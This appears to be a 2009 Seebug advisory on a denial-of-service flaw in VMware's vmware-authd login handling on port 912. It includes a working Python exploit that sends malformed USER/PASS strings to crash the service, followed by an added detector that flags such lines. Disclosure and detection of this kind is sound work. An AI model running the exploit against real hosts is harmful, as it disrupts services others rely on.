VMware Player and Workstation 'vmware-authd' Remote Denial of Service Vulnerability

2009-10-09T00:00:00
ID SSV:12441
Type seebug
Reporter Root
Modified 2009-10-09T00:00:00

Description

Bugtraq ID: 36630

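VMware Player is free software that lets PC users easily run virtual machines on a Windows or Linux PC. VMware Workstation is a popular virtual machine application. The VMware Authorization Service contains an error in its handling of login requests: submitting a "USER" or "PASS" string containing the '\xFF' character to the "vmware-authd" process listening on TCP port 912 can cause the service to stop responding. According to the report, vmware-authd.exe version 6.5.3.8888, as shipped in VMware Workstation 6.5.3 build 185404 and VMware Player 2.5.3 build 185404, is confirmed to be affected by this vulnerability. Other versions may also be affected.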

VMWare Workstation 6.5.3 build 185404
VMWare Player 2.5.3 build 185404

Vendor solution:

No detailed solution is currently available: http://www.vmware.com/

# ----------------------------------------------------------------------------
# VMware Authorization Service <= 2.5.3 (vmware-authd.exe) Format String DoS
# url: http://www.vmware.com/
#
# author: shinnai
# mail: shinnai[at]autistici[dot]org
# site: http://www.shinnai.net
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Tested on Windows XP Professional Ita SP3 full patched
# ----------------------------------------------------------------------------
# usage: C:\>exploit.py 127.0.0.1 912
import socket
import time
import sys
host = str(sys.argv[1])
port = int(sys.argv[2])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    conn = s.connect((host, port))
    d = s.recv(1024)
    print "Server <- " + d
    s.send('USER \x25\xFF \r\n')
    print 'Sending command "USER" + evil string...'
    d = s.recv(1024)
    print "Server response <- " + d
    s.send('PASS \x25\xFF \r\n')
    print 'Sending command "PASS" + evil string...'
    try:
        d = s.recv(1024)
        print "Server response <- " + d
    except:
        print "\nExploit completed..."
except:
    print "Something goes wrong honey..."
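
For detection, the login lines described above can be checked on the client-to-server side of TCP port 912. The following is an added example, not code from the advisory or from VMware: it flags "USER"/"PASS" arguments containing bytes outside printable ASCII (which covers '\xFF') or a '%' character. The record layout (src_ip, dst_port, payload), the function names and the sample addresses are assumptions made for illustration.

```python
import re

AUTHD_PORT = 912  # TCP port the advisory gives for vmware-authd
LOGIN_LINE = re.compile(rb"^(USER|PASS) (.*)$", re.IGNORECASE)


def suspicious_login_lines(payload):
    """Return [(verb, [reasons])] for USER/PASS lines with unusual arguments."""
    findings = []
    for raw in payload.split(b"\n"):
        match = LOGIN_LINE.match(raw.rstrip(b"\r"))
        if not match:
            continue
        verb, arg = match.group(1).upper().decode("ascii"), match.group(2)
        reasons = []
        # Bytes outside printable ASCII, which covers the 0xFF the advisory names.
        if any(b < 0x20 or b > 0x7E for b in arg):
            reasons.append("non-printable byte")
        # '%' is informational only: it can occur in a legitimate password.
        if b"%" in arg:
            reasons.append("percent sign")
        if reasons:
            findings.append((verb, reasons))
    return findings


def scan(records):
    """records: iterable of (src_ip, dst_port, payload); only port 912 is checked."""
    alerts = []
    for src_ip, dst_port, payload in records:
        if dst_port != AUTHD_PORT:
            continue
        for verb, reasons in suspicious_login_lines(payload):
            alerts.append((src_ip, verb, reasons))
    return alerts


# Constructed sample records (documentation addresses, not real traffic).
SAMPLE = [
    ("192.0.2.10", 912, b"USER alice\r\nPASS s3cret\r\n"),
    ("192.0.2.66", 912, b"USER \x25\xff \r\n"),
    ("192.0.2.66", 912, b"PASS \x25\xff \r\n"),
    ("192.0.2.66", 80, b"USER \x25\xff \r\n"),
]

if __name__ == "__main__":
    for alert in scan(SAMPLE):
        print(alert)
```

Since the advisory lists no vendor fix, an alert from a non-local source is also a prompt to check whether port 912 needs to be reachable from the network at all.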